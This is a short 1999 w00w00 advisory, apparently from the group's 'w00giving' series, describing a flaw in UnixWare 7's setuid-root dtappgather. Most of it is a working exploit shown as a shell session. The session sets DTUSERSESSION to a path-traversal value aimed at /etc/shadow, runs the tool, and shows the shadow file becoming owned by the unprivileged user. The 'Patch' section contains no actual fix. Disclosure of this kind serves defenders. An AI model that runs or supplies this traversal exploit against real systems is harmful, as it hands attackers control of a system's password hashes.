Subject: [w00giving '99] UnixWare 7's dtappgather w00w00 Security Development (WSD) Discovered by: K2 (ktwo@ktwo.ca) UnixWare 7's dtappgather runs with superuser privileges, but improperly check $DTUSERSESSION to ensure that the file is readable/writeable or owned by the user running it. --------------------------------------------------------------------------- Exploit: rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow rain:/usr/dt/bin$ ./dtappgather MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File exists rain:/usr/dt/bin$ ls -la /etc/shadow -r-xr-xr-x 1 ktwo other 358 Oct 26 04:37 /etc/shadow* --------------------------------------------------------------------------- Patch: Because SCO doesn't distribute source code for Unixware, we must disassemble the binaries and insert bytes. --------------------------------------------------------------------------- Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and interrupt People who deserve hellos: nocarrier, minus, daveg, rosieriv, nny, marc, and w00god blake ________________________________________________________________________________________________ Back to w00giving '99 Back to w00w00 webpage